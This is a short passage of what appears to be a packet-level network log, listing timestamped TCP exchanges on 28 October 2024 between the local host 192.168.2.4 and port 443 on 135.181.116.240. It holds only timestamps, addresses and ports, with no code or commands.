                                                                                                                                            Oct 28, 2024 15:49:50.203527927 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.203619003 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.203684092 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.203787088 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.203799963 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.203866959 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.204287052 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.204365015 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.204484940 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.204559088 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.225969076 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:50.226063967 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:50.2